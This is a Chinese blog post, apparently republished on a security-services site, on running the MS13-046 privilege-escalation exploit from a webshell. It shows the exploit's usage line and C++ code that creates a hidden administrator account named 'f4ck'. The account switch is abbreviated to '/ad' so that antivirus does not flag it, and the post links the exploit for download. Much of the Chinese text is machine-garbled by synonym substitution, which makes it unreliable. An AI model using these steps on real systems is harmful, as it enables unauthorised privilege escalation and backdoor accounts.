|
|
|
联系客服020-83701501

打破MS13-046不能webshell执行问题

联系在线客服,可以获得免费在线咨询服务。 QQ咨询 我要预约
冲破MS13-046不克不及webshell实验题目

MS13-046 EXP, 第一次我题目写的是MS13-053 EXP, 通篇看下来, 只有一团体发现题目所在; 而且我很明确的说了, webshell下带参数实验是无效的,我只是冲破这个标签。

咱们先看看这个是怎么说的。

ShellExecute( NULL, “open”, argv[1], argc > 2 ? argv[2] : NULL, NULL, SW_SHOW);

[溢出法度模范名] [要实验的法度模范名] [附带参数(可空)]

epathobj_exp32.exe cmd “net user 111 111 /add”

07给出的事例此中的要实验的法度模范名便是cmd。而我发现我实验32.exe cmd “net user 111 111 /add”的时辰只是把cmd弹出来了,并没实验负面的加用户。梗概是我姿势差池。开始给我看的那个二货腐蚀了

01.jpg

其时看到这个的第一个设法便是在webshell外表挪用我们本人上传的cmd去实验。是以本地架设一个来测试了一下

02.jpg

经受看看注明,

[溢出法度模范名] [要实验的法度模范名] [附带参数(可空)]

可实验法度模范。不克不及期待那个cmd弹出来。这我就范畴在cmd上了,后来想来是何等的二货。

加载此中的可实验法度模范,咱们本人写一个就好了。譬如来一段加用户的

Default
1234567891011 #include <iostream>#include <process.h>/*是增加一个帐号f4ck密码为f4ckf4ckf4ck的用户*/using namespace std;int main(){        system("net user f4ck f4ckf4ckf4ck /ad");//增加用户f4ck 密码为 f4ckf4ckf4ck        system("net localgroup administrators f4ck /ad ");//把户f4ck增加到打算组}

这里我操作ad而不操作add的起因便是我本地测试的时辰金山给我提醒了。

03.jpg
被提醒了,可是操作ad的时辰
04.jpg
把编译好的文件丢到我们要提权的目次下

看看实验前的
C:Documents and SettingsAdministrator桌面>net user

F4CK-73C3MCB46M 的用户帐户

——————————————————————————-
Administrator? ?? ?? ?? ?Guest? ?? ?? ?? ?? ?? ???SUPPORT_388945a0
呼吁腐蚀完成。

C:Documents and SettingsAdministrator桌面>

我们在webshell外表实验这个文件尝尝
05.jpg

腐蚀的增加。腐蚀的冲破我本人的固有思想。

着实这此中并没啥技艺含量。webshell实验呼吁,很常规吧,写个增加用户的,也是很思空见贯,不会写没关系,baidu一大堆。次要的思路罢了。

供给下载:

链接:http://pan.baidu.com/share/link?shareid=476569584&uk=355651282 提取码:p2eh

link:team.f4ck.net

本文由Internet保险攻防研讨室(www.91ri.org)新闻保险小组搜集整理,转载请注目来因。

数安新闻+更多

证书相关+更多